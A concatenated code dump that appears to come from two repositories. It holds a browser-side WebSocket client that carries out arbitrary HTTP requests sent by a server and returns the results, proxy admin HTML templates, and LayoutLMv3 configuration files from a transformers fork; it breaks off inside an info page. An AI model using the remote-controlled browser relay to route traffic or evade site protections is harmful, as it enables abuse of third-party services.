// 将原始字符串逐字节编码为base64
function _rawStringToBase64(str) {
// 将字符串转换为UTF-8编码的字节数组
const encoder = new TextEncoder();
const bytes = encoder.encode(str);
return _rawBytesToBase64(bytes);
}
// 连接到WebSocket服务器
function connectToServer() {
if (socket && socket.readyState === WebSocket.CONNECTING) {
log('正在连接中,请稍候', 'info');
return;
}
if (socket && socket.readyState === WebSocket.OPEN) {
log('已经连接到服务器', 'info');
return;
}
// 清除可能存在的重连计时器
if (reconnectTimeout) {
clearTimeout(reconnectTimeout);
reconnectTimeout = null;
}
updateStatus('connecting');
// 获取当前主机和协议
const protocol = window.location.protocol === 'https:' ? 'wss:' : 'ws:';
// 默认连接到同一主机的8766端口
const wsUrl = `${protocol}//${window.location.hostname}:8766/ws`;
try {
log(`尝试连接到 ${wsUrl}`);
socket = new WebSocket(wsUrl);
socket.onopen = function(event) {
log('成功连接到WebSocket服务器', 'success');
updateStatus('connected');
reconnectAttempts = 0; // 重置重连次数
// 获取或尝试检测代理地址
detectProxyAddress();
// 获取浏览器版本
const browserVersion = getBrowserVersion();
log(`浏览器版本: ${browserVersion}`);
// 向服务器发送客户端类型信息
socket.send(JSON.stringify({
type: 'client_info',
client_type: 'browser',
client_name: `浏览器 ${Math.floor(Math.random() * 1000)}`,
proxy: proxyAddress,
proxy_id: proxyId, // 添加代理ID信息
version: browserVersion
}));
};
socket.onmessage = async function(event) {
const message = event.data;
try {
const data = JSON.parse(message);
log(`收到服务器消息: ${JSON.stringify(data).slice(0, 100)}${JSON.stringify(data).length > 100 ? '...' : ''}`);
if (data.type === 'client_info_response') {
// 服务器返回客户端信息
clientId = data.client_id;
log(`服务器已分配客户端ID: ${clientId}`, 'info');
}
else if (data.type === 'execute_request') {
// 服务器要求执行HTTP请求
const requestId = data.id;
const params = data.params;
// 解码 base64 到二进制
function base64ToUint8Array(base64) {
const binaryStr = atob(base64);
const len = binaryStr.length;
const bytes = new Uint8Array(len);
for (let i = 0; i < len; i++) {
bytes[i] = binaryStr.charCodeAt(i);
}
return bytes;
}
log(`执行请求: ${params.method} ${params.url}`);
if (params.bodyType == 'b64'){
var binaryData = base64ToUint8Array(params.body);
params.body = binaryData
}
// 执行请求
const result = await sendRequest(
params.url,
params.method || 'GET',
params.headers || {},
params.body
);
// 将结果发送回服务器
socket.send(JSON.stringify({
type: 'response',
id: requestId,
data: result
}));
log(`请求完成: ${params.url}`, 'success');
}
} catch (error) {
log(`解析消息出错: ${error.message}`, 'error');
}
};
socket.onclose = function(event) {
log(`连接已关闭: ${event.reason}`, event.wasClean ? 'info' : 'error');
socket = null;
updateStatus('disconnected');
scheduleReconnect();
};
socket.onerror = function(error) {
log(`WebSocket错误`, 'error');
updateStatus('disconnected');
};
} catch (error) {
log(`创建WebSocket连接出错: ${error.message}`, 'error');
updateStatus('disconnected');
scheduleReconnect();
}
}
// 安排重新连接
function scheduleReconnect() {
if (reconnectAttempts >= maxReconnectAttempts) {
log(`已达到最大重连次数 (${maxReconnectAttempts}),停止重连`, 'error');
return;
}
reconnectAttempts++;
// 清除现有的超时
if (reconnectTimeout) {
clearTimeout(reconnectTimeout);
}
log(`将在10秒后尝试重新连接 (尝试 ${reconnectAttempts}/${maxReconnectAttempts})`, 'info');
reconnectTimeout = setTimeout(() => {
log('正在尝试重新连接...', 'info');
connectToServer();
}, 10000); // 10秒后重连
}
// 客户端ID
let ws = null;
// 发送消息到服务器
function sendMessageToServer(message) {
if (socket && socket.readyState === WebSocket.OPEN) {
socket.send(JSON.stringify(message));
console.log(`已发送消息到服务器: ${message.type}`);
} else {
console.error('WebSocket连接未建立或已关闭');
}
}
// 修改原有的WebSocket消息处理函数,添加XHR请求支持
function handleWebSocketMessage(event) {
try {
const message = JSON.parse(event.data);
if (message.type === "execute_request") {
// 使用XHR异步处理请求
handleXHRRequest(message);
} else if (message.type === "client_info_response") {
clientId = message.client_id;
console.log(`服务器已分配客户端ID: ${clientId}`);
}
} catch (e) {
console.error(`处理WebSocket消息失败: ${e.message}`);
}
}
// 初始化WebSocket连接 - 这个函数会被废弃,不再使用
function initWebSocket() {
console.warn("initWebSocket函数已废弃,请使用connectToServer函数");
}
// 修改页面加载事件,确保只连接一次WebSocket
window.addEventListener('load', function() {
// 显示/隐藏日志(双击状态栏)
statusDiv.addEventListener('dblclick', function() {
logsDiv.classList.toggle('hidden');
});
// 延迟1秒后连接,确保页面完全加载
setTimeout(connectToServer, 1000);
// 添加XHR支持
socket = null; // 确保不会创建重复连接
log("已启用XHR异步请求处理", "info");
});
// 检测页面可见性变化,在页面变为可见时尝试重新连接
document.addEventListener('visibilitychange', function() {
if (document.visibilityState === 'visible' && (!socket || socket.readyState !== WebSocket.OPEN)) {
log('页面变为可见,尝试重新连接', 'info');
connectToServer();
}
});
// 添加XHR异步请求处理函数
function handleXHRRequest(requestData) {
const params = requestData.params;
const url = params.url;
const method = params.method || 'GET';
const headers = params.headers || {};
const body = params.body;
const requestId = requestData.id;
console.log(`开始处理XHR请求: ${method} ${url}`);
// 使用简化版的sendRequest进行处理
// 由于我们已经对sendRequest函数进行了修改以支持数组格式的headers
// 这里直接调用它来处理请求,确保一致性
const result = sendRequest(url, method, headers, body);
// 构建响应对象并发送
const responseData = {
type: "response",
id: requestId,
data: result
};
if (socket && socket.readyState === WebSocket.OPEN) {
socket.send(JSON.stringify(responseData));
console.log(`请求完成: ${url}, 状态: ${result.status}`);
} else {
console.error('WebSocket连接未建立或已关闭,无法发送响应');
}
}
</script>
</body>
</html> |
27182812/ChatGLM-LLaMA-chinese-insturct | 13,365 | src/transformers/models/layoutlmv3/configuration_layoutlmv3.py | # coding=utf-8
# Copyright 2022 Microsoft Research and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" LayoutLMv3 model configuration"""
from collections import OrderedDict
from typing import TYPE_CHECKING, Any, Mapping, Optional
from packaging import version
from ...configuration_utils import PretrainedConfig
from ...onnx import OnnxConfig
from ...onnx.utils import compute_effective_axis_dimension
from ...utils import logging
if TYPE_CHECKING:
from ...processing_utils import ProcessorMixin
from ...utils import TensorType
logger = logging.get_logger(__name__)
LAYOUTLMV3_PRETRAINED_CONFIG_ARCHIVE_MAP = {
"microsoft/layoutlmv3-base": "https://huggingface.co/microsoft/layoutlmv3-base/resolve/main/config.json",
}
class LayoutLMv3Config(PretrainedConfig):
r"""
This is the configuration class to store the configuration of a [`LayoutLMv3Model`]. It is used to instantiate an
LayoutLMv3 model according to the specified arguments, defining the model architecture. Instantiating a
configuration with the defaults will yield a similar configuration to that of the LayoutLMv3
[microsoft/layoutlmv3-base](https://huggingface.co/microsoft/layoutlmv3-base) architecture.
Configuration objects inherit from [`PretrainedConfig`] and can be used to control the model outputs. Read the
documentation from [`PretrainedConfig`] for more information.
Args:
vocab_size (`int`, *optional*, defaults to 50265):
Vocabulary size of the LayoutLMv3 model. Defines the number of different tokens that can be represented by
the `inputs_ids` passed when calling [`LayoutLMv3Model`].
hidden_size (`int`, *optional*, defaults to 768):
Dimension of the encoder layers and the pooler layer.
num_hidden_layers (`int`, *optional*, defaults to 12):
Number of hidden layers in the Transformer encoder.
num_attention_heads (`int`, *optional*, defaults to 12):
Number of attention heads for each attention layer in the Transformer encoder.
intermediate_size (`int`, *optional*, defaults to 3072):
Dimension of the "intermediate" (i.e., feed-forward) layer in the Transformer encoder.
hidden_act (`str` or `function`, *optional*, defaults to `"gelu"`):
The non-linear activation function (function or string) in the encoder and pooler. If string, `"gelu"`,
`"relu"`, `"selu"` and `"gelu_new"` are supported.
hidden_dropout_prob (`float`, *optional*, defaults to 0.1):
The dropout probabilitiy for all fully connected layers in the embeddings, encoder, and pooler.
attention_probs_dropout_prob (`float`, *optional*, defaults to 0.1):
The dropout ratio for the attention probabilities.
max_position_embeddings (`int`, *optional*, defaults to 512):
The maximum sequence length that this model might ever be used with. Typically set this to something large
just in case (e.g., 512 or 1024 or 2048).
type_vocab_size (`int`, *optional*, defaults to 2):
The vocabulary size of the `token_type_ids` passed when calling [`LayoutLMv3Model`].
initializer_range (`float`, *optional*, defaults to 0.02):
The standard deviation of the truncated_normal_initializer for initializing all weight matrices.
layer_norm_eps (`float`, *optional*, defaults to 1e-5):
The epsilon used by the layer normalization layers.
max_2d_position_embeddings (`int`, *optional*, defaults to 1024):
The maximum value that the 2D position embedding might ever be used with. Typically set this to something
large just in case (e.g., 1024).
coordinate_size (`int`, *optional*, defaults to `128`):
Dimension of the coordinate embeddings.
shape_size (`int`, *optional*, defaults to `128`):
Dimension of the width and height embeddings.
has_relative_attention_bias (`bool`, *optional*, defaults to `True`):
Whether or not to use a relative attention bias in the self-attention mechanism.
rel_pos_bins (`int`, *optional*, defaults to 32):
The number of relative position bins to be used in the self-attention mechanism.
max_rel_pos (`int`, *optional*, defaults to 128):
The maximum number of relative positions to be used in the self-attention mechanism.
max_rel_2d_pos (`int`, *optional*, defaults to 256):
The maximum number of relative 2D positions in the self-attention mechanism.
rel_2d_pos_bins (`int`, *optional*, defaults to 64):
The number of 2D relative position bins in the self-attention mechanism.
has_spatial_attention_bias (`bool`, *optional*, defaults to `True`):
Whether or not to use a spatial attention bias in the self-attention mechanism.
visual_embed (`bool`, *optional*, defaults to `True`):
Whether or not to add patch embeddings.
input_size (`int`, *optional*, defaults to `224`):
The size (resolution) of the images.
num_channels (`int`, *optional*, defaults to `3`):
The number of channels of the images.
patch_size (`int`, *optional*, defaults to `16`)
The size (resolution) of the patches.
classifier_dropout (`float`, *optional*):
The dropout ratio for the classification head.
Example:
```python
>>> from transformers import LayoutLMv3Config, LayoutLMv3Model
>>> # Initializing a LayoutLMv3 microsoft/layoutlmv3-base style configuration
>>> configuration = LayoutLMv3Config()
>>> # Initializing a model (with random weights) from the microsoft/layoutlmv3-base style configuration
>>> model = LayoutLMv3Model(configuration)
>>> # Accessing the model configuration
>>> configuration = model.config
```"""
model_type = "layoutlmv3"
def __init__(
self,
vocab_size=50265,
hidden_size=768,
num_hidden_layers=12,
num_attention_heads=12,
intermediate_size=3072,
hidden_act="gelu",
hidden_dropout_prob=0.1,
attention_probs_dropout_prob=0.1,
max_position_embeddings=512,
type_vocab_size=2,
initializer_range=0.02,
layer_norm_eps=1e-5,
pad_token_id=1,
bos_token_id=0,
eos_token_id=2,
max_2d_position_embeddings=1024,
coordinate_size=128,
shape_size=128,
has_relative_attention_bias=True,
rel_pos_bins=32,
max_rel_pos=128,
rel_2d_pos_bins=64,
max_rel_2d_pos=256,
has_spatial_attention_bias=True,
text_embed=True,
visual_embed=True,
input_size=224,
num_channels=3,
patch_size=16,
classifier_dropout=None,
**kwargs,
):
super().__init__(
vocab_size=vocab_size,
hidden_size=hidden_size,
num_hidden_layers=num_hidden_layers,
num_attention_heads=num_attention_heads,
intermediate_size=intermediate_size,
hidden_act=hidden_act,
hidden_dropout_prob=hidden_dropout_prob,
attention_probs_dropout_prob=attention_probs_dropout_prob,
max_position_embeddings=max_position_embeddings,
type_vocab_size=type_vocab_size,
initializer_range=initializer_range,
layer_norm_eps=layer_norm_eps,
pad_token_id=pad_token_id,
bos_token_id=bos_token_id,
eos_token_id=eos_token_id,
**kwargs,
)
self.max_2d_position_embeddings = max_2d_position_embeddings
self.coordinate_size = coordinate_size
self.shape_size = shape_size
self.has_relative_attention_bias = has_relative_attention_bias
self.rel_pos_bins = rel_pos_bins
self.max_rel_pos = max_rel_pos
self.has_spatial_attention_bias = has_spatial_attention_bias
self.rel_2d_pos_bins = rel_2d_pos_bins
self.max_rel_2d_pos = max_rel_2d_pos
self.text_embed = text_embed
self.visual_embed = visual_embed
self.input_size = input_size
self.num_channels = num_channels
self.patch_size = patch_size
self.classifier_dropout = classifier_dropout
class LayoutLMv3OnnxConfig(OnnxConfig):
torch_onnx_minimum_version = version.parse("1.12")
@property
def inputs(self) -> Mapping[str, Mapping[int, str]]:
# The order of inputs is different for question answering and sequence classification
if self.task in ["question-answering", "sequence-classification"]:
return OrderedDict(
[
("input_ids", {0: "batch", 1: "sequence"}),
("attention_mask", {0: "batch", 1: "sequence"}),
("bbox", {0: "batch", 1: "sequence"}),
("pixel_values", {0: "batch", 1: "num_channels", 2: "height", 3: "width"}),
]
)
else:
return OrderedDict(
[
("input_ids", {0: "batch", 1: "sequence"}),
("bbox", {0: "batch", 1: "sequence"}),
("attention_mask", {0: "batch", 1: "sequence"}),
("pixel_values", {0: "batch", 1: "num_channels"}),
]
)
@property
def atol_for_validation(self) -> float:
return 1e-5
@property
def default_onnx_opset(self) -> int:
return 12
def generate_dummy_inputs(
self,
processor: "ProcessorMixin",
batch_size: int = -1,
seq_length: int = -1,
is_pair: bool = False,
framework: Optional["TensorType"] = None,
num_channels: int = 3,
image_width: int = 40,
image_height: int = 40,
) -> Mapping[str, Any]:
"""
Generate inputs to provide to the ONNX exporter for the specific framework
Args:
processor ([`ProcessorMixin`]):
The processor associated with this model configuration.
batch_size (`int`, *optional*, defaults to -1):
The batch size to export the model for (-1 means dynamic axis).
seq_length (`int`, *optional*, defaults to -1):
The sequence length to export the model for (-1 means dynamic axis).
is_pair (`bool`, *optional*, defaults to `False`):
Indicate if the input is a pair (sentence 1, sentence 2).
framework (`TensorType`, *optional*, defaults to `None`):
The framework (PyTorch or TensorFlow) that the processor will generate tensors for.
num_channels (`int`, *optional*, defaults to 3):
The number of channels of the generated images.
image_width (`int`, *optional*, defaults to 40):
The width of the generated images.
image_height (`int`, *optional*, defaults to 40):
The height of the generated images.
Returns:
Mapping[str, Any]: holding the kwargs to provide to the model's forward function
"""
# A dummy image is used so OCR should not be applied
setattr(processor.feature_extractor, "apply_ocr", False)
# If dynamic axis (-1) we forward with a fixed dimension of 2 samples to avoid optimizations made by ONNX
batch_size = compute_effective_axis_dimension(
batch_size, fixed_dimension=OnnxConfig.default_fixed_batch, num_token_to_add=0
)
# If dynamic axis (-1) we forward with a fixed dimension of 8 tokens to avoid optimizations made by ONNX
token_to_add = processor.tokenizer.num_special_tokens_to_add(is_pair)
seq_length = compute_effective_axis_dimension(
seq_length, fixed_dimension=OnnxConfig.default_fixed_sequence, num_token_to_add=token_to_add
)
# Generate dummy inputs according to compute batch and sequence
dummy_text = [[" ".join([processor.tokenizer.unk_token]) * seq_length]] * batch_size
# Generate dummy bounding boxes
dummy_bboxes = [[[48, 84, 73, 128]]] * batch_size
# If dynamic axis (-1) we forward with a fixed dimension of 2 samples to avoid optimizations made by ONNX
# batch_size = compute_effective_axis_dimension(batch_size, fixed_dimension=OnnxConfig.default_fixed_batch)
dummy_image = self._generate_dummy_images(batch_size, num_channels, image_height, image_width)
inputs = dict(
processor(
dummy_image,
text=dummy_text,
boxes=dummy_bboxes,
return_tensors=framework,
)
)
return inputs
|
27182812/ChatGLM-LLaMA-chinese-insturct | 4,512 | src/transformers/models/layoutlmv3/__init__.py | # Copyright 2022 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING
from ...utils import (
OptionalDependencyNotAvailable,
_LazyModule,
is_tf_available,
is_tokenizers_available,
is_torch_available,
is_vision_available,
)
_import_structure = {
"configuration_layoutlmv3": [
"LAYOUTLMV3_PRETRAINED_CONFIG_ARCHIVE_MAP",
"LayoutLMv3Config",
"LayoutLMv3OnnxConfig",
],
"processing_layoutlmv3": ["LayoutLMv3Processor"],
"tokenization_layoutlmv3": ["LayoutLMv3Tokenizer"],
}
try:
if not is_tokenizers_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
_import_structure["tokenization_layoutlmv3_fast"] = ["LayoutLMv3TokenizerFast"]
try:
if not is_torch_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
_import_structure["modeling_layoutlmv3"] = [
"LAYOUTLMV3_PRETRAINED_MODEL_ARCHIVE_LIST",
"LayoutLMv3ForQuestionAnswering",
"LayoutLMv3ForSequenceClassification",
"LayoutLMv3ForTokenClassification",
"LayoutLMv3Model",
"LayoutLMv3PreTrainedModel",
]
try:
if not is_tf_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
_import_structure["modeling_tf_layoutlmv3"] = [
"TF_LAYOUTLMV3_PRETRAINED_MODEL_ARCHIVE_LIST",
"TFLayoutLMv3ForQuestionAnswering",
"TFLayoutLMv3ForSequenceClassification",
"TFLayoutLMv3ForTokenClassification",
"TFLayoutLMv3Model",
"TFLayoutLMv3PreTrainedModel",
]
try:
if not is_vision_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
_import_structure["feature_extraction_layoutlmv3"] = ["LayoutLMv3FeatureExtractor"]
_import_structure["image_processing_layoutlmv3"] = ["LayoutLMv3ImageProcessor"]
if TYPE_CHECKING:
from .configuration_layoutlmv3 import (
LAYOUTLMV3_PRETRAINED_CONFIG_ARCHIVE_MAP,
LayoutLMv3Config,
LayoutLMv3OnnxConfig,
)
from .processing_layoutlmv3 import LayoutLMv3Processor
from .tokenization_layoutlmv3 import LayoutLMv3Tokenizer
try:
if not is_tokenizers_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
from .tokenization_layoutlmv3_fast import LayoutLMv3TokenizerFast
try:
if not is_torch_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
from .modeling_layoutlmv3 import (
LAYOUTLMV3_PRETRAINED_MODEL_ARCHIVE_LIST,
LayoutLMv3ForQuestionAnswering,
LayoutLMv3ForSequenceClassification,
LayoutLMv3ForTokenClassification,
LayoutLMv3Model,
LayoutLMv3PreTrainedModel,
)
try:
if not is_tf_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
from .modeling_tf_layoutlmv3 import (
TF_LAYOUTLMV3_PRETRAINED_MODEL_ARCHIVE_LIST,
TFLayoutLMv3ForQuestionAnswering,
TFLayoutLMv3ForSequenceClassification,
TFLayoutLMv3ForTokenClassification,
TFLayoutLMv3Model,
TFLayoutLMv3PreTrainedModel,
)
try:
if not is_vision_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
from .feature_extraction_layoutlmv3 import LayoutLMv3FeatureExtractor
from .image_processing_layoutlmv3 import LayoutLMv3ImageProcessor
else:
import sys
sys.modules[__name__] = _LazyModule(__name__, globals()["__file__"], _import_structure, module_spec=__spec__)
|
2833844911/cyTlsXhr | 10,648 | templates/dashboard.html | <!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>代理服务器管理面板</title>
<link rel="stylesheet" href="/static/css/style.css">
</head>
<body>
<div class="dashboard-container">
<header class="dashboard-header">
<h1>代理服务器管理系统</h1>
<div class="user-info">
<span id="current-user">管理员</span>
<button id="logout-btn" class="btn-logout">退出登录</button>
</div>
</header>
<div class="dashboard-content">
<div class="sidebar">
<ul class="nav-menu">
<li data-tab="ports" data-tab="status">多端口管理</li>
<li data-tab="settings">系统设置</li>
<li data-tab="stats">访问统计</li>
</ul>
</div>
<div class="main-content">
<!-- 服务器状态面板 -->
<div id="status-panel" class="panel active">
<h2>服务器状态</h2>
<div class="status-card">
<div class="status-item">
<span class="label">运行状态:</span>
<span id="proxy-status" class="value status-indicator">停止</span>
</div>
<div class="status-item">
<span class="label">监听地址:</span>
<span id="proxy-address" class="value">0.0.0.0:8080</span>
</div>
<div class="status-item">
<span class="label">启动时间:</span>
<span id="start-time" class="value">-</span>
</div>
<div class="status-item">
<span class="label">总连接数:</span>
<span id="connection-count" class="value">0</span>
</div>
<div class="status-actions">
<button id="start-proxy" class="btn-action">启动服务</button>
<button id="stop-proxy" class="btn-action" disabled>停止服务</button>
</div>
</div>
</div>
<!-- 多端口管理面板 -->
<div id="ports-panel" class="panel">
<h2>多端口管理</h2>
<div class="ports-container">
<div class="ports-list-container">
<table class="ports-table">
<thead>
<tr>
<th>监听地址</th>
<th>状态</th>
<th>连接数</th>
<th>匿名访问</th>
<th>操作</th>
</tr>
</thead>
<tbody id="ports-list">
<!-- 端口列表将通过JavaScript动态生成 -->
</tbody>
</table>
</div>
<div class="add-port-form">
<h3>添加新端口</h3>
<form id="add-port-form">
<div class="form-group">
<label for="new-port-addr">监听地址 (格式: IP:端口)</label>
<input type="text" id="new-port-addr" name="listen_addr" placeholder="例如: 0.0.0.0:8082" required>
</div>
<div class="form-group checkbox-group">
<input type="checkbox" id="new-port-anonymous" name="allow_anonymous">
<label for="new-port-anonymous">允许匿名访问 (不需要账号密码)</label>
</div>
<button type="submit" class="btn-add">添加端口</button>
</form>
</div>
</div>
</div>
<!-- 用户管理面板 -->
<div id="users-panel" class="panel">
<h2>用户管理</h2>
<div class="user-list-container">
<table class="user-table">
<thead>
<tr>
<th>用户名</th>
<th>密码</th>
<th>操作</th>
</tr>
</thead>
<tbody id="user-list">
<!-- 用户列表将通过JavaScript动态生成 -->
</tbody>
</table>
<div class="add-user-form">
<h3>添加新用户</h3>
<form id="add-user-form">
<div class="form-group">
<label for="new-username">用户名</label>
<input type="text" id="new-username" name="username" required>
</div>
<div class="form-group">
<label for="new-password">密码</label>
<input type="password" id="new-password" name="password" required>
</div>
<div class="form-group checkbox-group">
<input type="checkbox" id="no-auth-user" name="no-auth-user">
<label for="no-auth-user">无需认证的用户(不需要账号密码)</label>
</div>
<button type="submit" class="btn-add">添加用户</button>
</form>
</div>
</div>
</div>
<!-- 系统设置面板 -->
<div id="settings-panel" class="panel">
<h2>系统设置</h2>
<form id="settings-form" class="settings-form">
<div class="form-group">
<label for="proxy-port">默认代理服务器端口</label>
<input type="number" id="proxy-port" name="proxy-port" min="1" max="65535" value="8080" required>
</div>
<div class="form-group">
<label for="web-port">Web管理端口</label>
<input type="number" id="web-port" name="web-port" min="1" max="65535" value="8081" required>
</div>
<div class="form-group">
<label for="admin-username">管理员用户名</label>
<input type="text" id="admin-username" name="admin-username" value="admin" required>
</div>
<div class="form-group">
<label for="admin-password">管理员密码</label>
<input type="password" id="admin-password" name="admin-password" placeholder="输入新密码以修改" autocomplete="new-password">
</div>
<div class="form-group checkbox-group">
<input type="checkbox" id="use-forward-proxy" name="use-forward-proxy">
<label for="use-forward-proxy">启用代理转发</label>
</div>
<div id="remote-proxy-settings" style="display: none; margin-left: 25px; border-left: 2px solid #1890ff; padding-left: 10px;">
<div class="form-group">
<label for="remote-proxy-addr">远程代理地址 (格式: IP:端口)</label>
<input type="text" id="remote-proxy-addr" name="remote-proxy-addr" placeholder="例如: 160.20.18.17:3989">
</div>
<div class="form-group">
<label for="remote-proxy-user">远程代理用户名</label>
<input type="text" id="remote-proxy-user" name="remote-proxy-user" placeholder="例如: admin">
</div>
<div class="form-group">
<label for="remote-proxy-pass">远程代理密码</label>
<input type="password" id="remote-proxy-pass" name="remote-proxy-pass" placeholder="输入远程代理密码">
</div>
</div>
<div class="form-group checkbox-group">
<input type="checkbox" id="allow-anonymous" name="allow-anonymous">
<label for="allow-anonymous">允许匿名访问 (不需要账号密码即可使用代理)</label>
</div>
<button type="submit" class="btn-save">保存设置</button>
</form>
</div>
<!-- 访问统计面板 -->
<div id="stats-panel" class="panel">
<h2>访问统计</h2>
<div class="stats-summary">
<div class="stats-card">
<h3>总请求数</h3>
<div id="total-requests" class="stats-value">0</div>
</div>
<div class="stats-card">
<h3>域名统计</h3>
<div class="stats-table-container">
<table class="stats-table">
<thead>
<tr>
<th>域名</th>
<th>请求次数</th>
<th>最后访问时间</th>
</tr>
</thead>
<tbody id="domain-stats">
<!-- 域名统计将通过JavaScript动态生成 -->
</tbody>
</table>
</div>
</div>
<button id="reset-stats" class="btn-reset">重置统计</button>
</div>
</div>
</div>
</div>
</div>
<script src="/static/js/dashboard.js"></script>
</body>
</html> |
2833844911/cyTlsXhr | 2,468 | templates/admin_login.html | <!DOCTYPE html>
<html lang="zh">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>管理员登录</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f5f5f5;
margin: 0;
padding: 0;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
}
.login-container {
background-color: #ffffff;
border-radius: 8px;
box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
padding: 30px;
width: 350px;
max-width: 100%;
}
h1 {
text-align: center;
color: #333;
margin-bottom: 30px;
}
.form-group {
margin-bottom: 20px;
}
label {
display: block;
margin-bottom: 5px;
color: #555;
font-weight: bold;
}
input[type="text"],
input[type="password"] {
width: 100%;
padding: 10px;
border: 1px solid #ddd;
border-radius: 4px;
box-sizing: border-box;
font-size: 16px;
}
button {
background-color: #4a90e2;
color: white;
border: none;
border-radius: 4px;
padding: 12px 20px;
font-size: 16px;
cursor: pointer;
width: 100%;
transition: background-color 0.3s;
}
button:hover {
background-color: #357abd;
}
.error-message {
color: #e74c3c;
margin-top: 15px;
text-align: center;
}
</style>
</head>
<body>
<div class="login-container">
<h1>管理员登录</h1>
{{if .Error}}
<div class="error-message">{{.Error}}</div>
{{end}}
<form action="/admin/login" method="post">
<div class="form-group">
<label for="username">用户名</label>
<input type="text" id="username" name="username" required>
</div>
<div class="form-group">
<label for="password">密码</label>
<input type="password" id="password" name="password" required>
</div>
<button type="submit">登录</button>
</form>
</div>
</body>
</html> |
2833844911/cyTlsXhr | 22,039 | templates/info.html | <!DOCTYPE html>
<html lang="zh">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>浏览器代理系统信息</title>
<style>
body {
font-family: Arial, sans-serif;
margin: 0;
padding: 20px;
background-color: #f5f5f5;
}
.container {
max-width: 1200px;
margin: 0 auto;
background-color: white;
border-radius: 8px;
box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
padding: 20px;
}
h1, h2, h3 {
color: #333;
}
.header {
display: flex;
justify-content: space-between;
align-items: center;
margin-bottom: 20px;
}
.logout-btn {
background-color: #f44336;
color: white;
border: none;
padding: 8px 16px;
border-radius: 4px;
cursor: pointer;
font-size: 14px;
}
.logout-btn:hover {
background-color: #d32f2f;
}
.info-card {
background-color: #f9f9f9;
border-radius: 8px;
padding: 15px;
margin-bottom: 20px;
box-shadow: 0 1px 3px rgba(0, 0, 0, 0.1);
}
.info-grid {
display: grid;
grid-template-columns: repeat(3, 1fr);
gap: 20px;
margin-bottom: 30px;
}
.info-item {
background-color: #fff;
border-radius: 6px;
box-shadow: 0 1px 5px rgba(0, 0, 0, 0.08);
padding: 15px;
text-align: center;
}
.info-item h3 {
margin-top: 0;
color: #666;
font-size: 16px;
}
.info-value {
font-size: 32px;
font-weight: bold;
color: #2a5885;
}
table {
width: 100%;
border-collapse: collapse;
margin: 20px 0;
}
th, td {
padding: 12px 15px;
text-align: left;
border-bottom: 1px solid #e0e0e0;
}
th {
background-color: #f2f2f2;
font-weight: bold;
color: #333;
}
tr:hover {
background-color: #f9f9f9;
}
.status-badge {
display: inline-block;
padding: 4px 8px;
border-radius: 4px;
font-size: 12px;
font-weight: bold;
color: white;
}
.status-connected {
background-color: #4CAF50;
}
.status-disconnected {
background-color: #F44336;
}
.status-busy {
background-color: #FF9800;
}
.tabs {
display: flex;
border-bottom: 1px solid #ddd;
margin-bottom: 20px;
}
.tab {
padding: 10px 20px;
cursor: pointer;
border: 1px solid transparent;
border-bottom: none;
margin-right: 5px;
border-radius: 4px 4px 0 0;
}
.tab.active {
border-color: #ddd;
background-color: white;
margin-bottom: -1px;
color: #2a5885;
font-weight: bold;
}
.tab-content {
display: none;
}
.tab-content.active {
display: block;
}
.refresh-btn {
background-color: #4CAF50;
color: white;
border: none;
padding: 8px 16px;
border-radius: 4px;
cursor: pointer;
font-size: 14px;
float: right;
}
.refresh-btn:hover {
background-color: #45a049;
}
.action-btn {
background-color: #2196F3;
color: white;
border: none;
padding: 6px 12px;
border-radius: 4px;
cursor: pointer;
font-size: 13px;
margin-right: 5px;
}
.action-btn.delete {
background-color: #F44336;
}
.action-btn:hover {
opacity: 0.9;
}
.form-container {
max-width: 600px;
margin: 0 auto;
background-color: #f9f9f9;
padding: 20px;
border-radius: 8px;
}
.form-group {
margin-bottom: 15px;
}
label {
display: block;
margin-bottom: 5px;
font-weight: bold;
}
input[type="text"],
input[type="number"],
input[type="date"],
input[type="time"],
select {
width: 100%;
padding: 8px;
border: 1px solid #ddd;
border-radius: 4px;
box-sizing: border-box;
}
.checkbox-group {
margin: 10px 0;
}
.submit-btn {
background-color: #4CAF50;
color: white;
border: none;
padding: 10px 20px;
border-radius: 4px;
cursor: pointer;
font-size: 16px;
margin-top: 10px;
}
.submit-btn:hover {
background-color: #45a049;
}
.token-display {
background-color: #e9f7e9;
border: 1px solid #4CAF50;
padding: 15px;
border-radius: 4px;
margin-top: 20px;
display: none;
}
.token-value {
font-family: monospace;
background-color: #f0f0f0;
padding: 5px;
border-radius: 3px;
word-break: break-all;
}
.hidden {
display: none;
}
</style>
</head>
<body>
<div class="container">
<div class="header">
<h1>浏览器代理系统信息
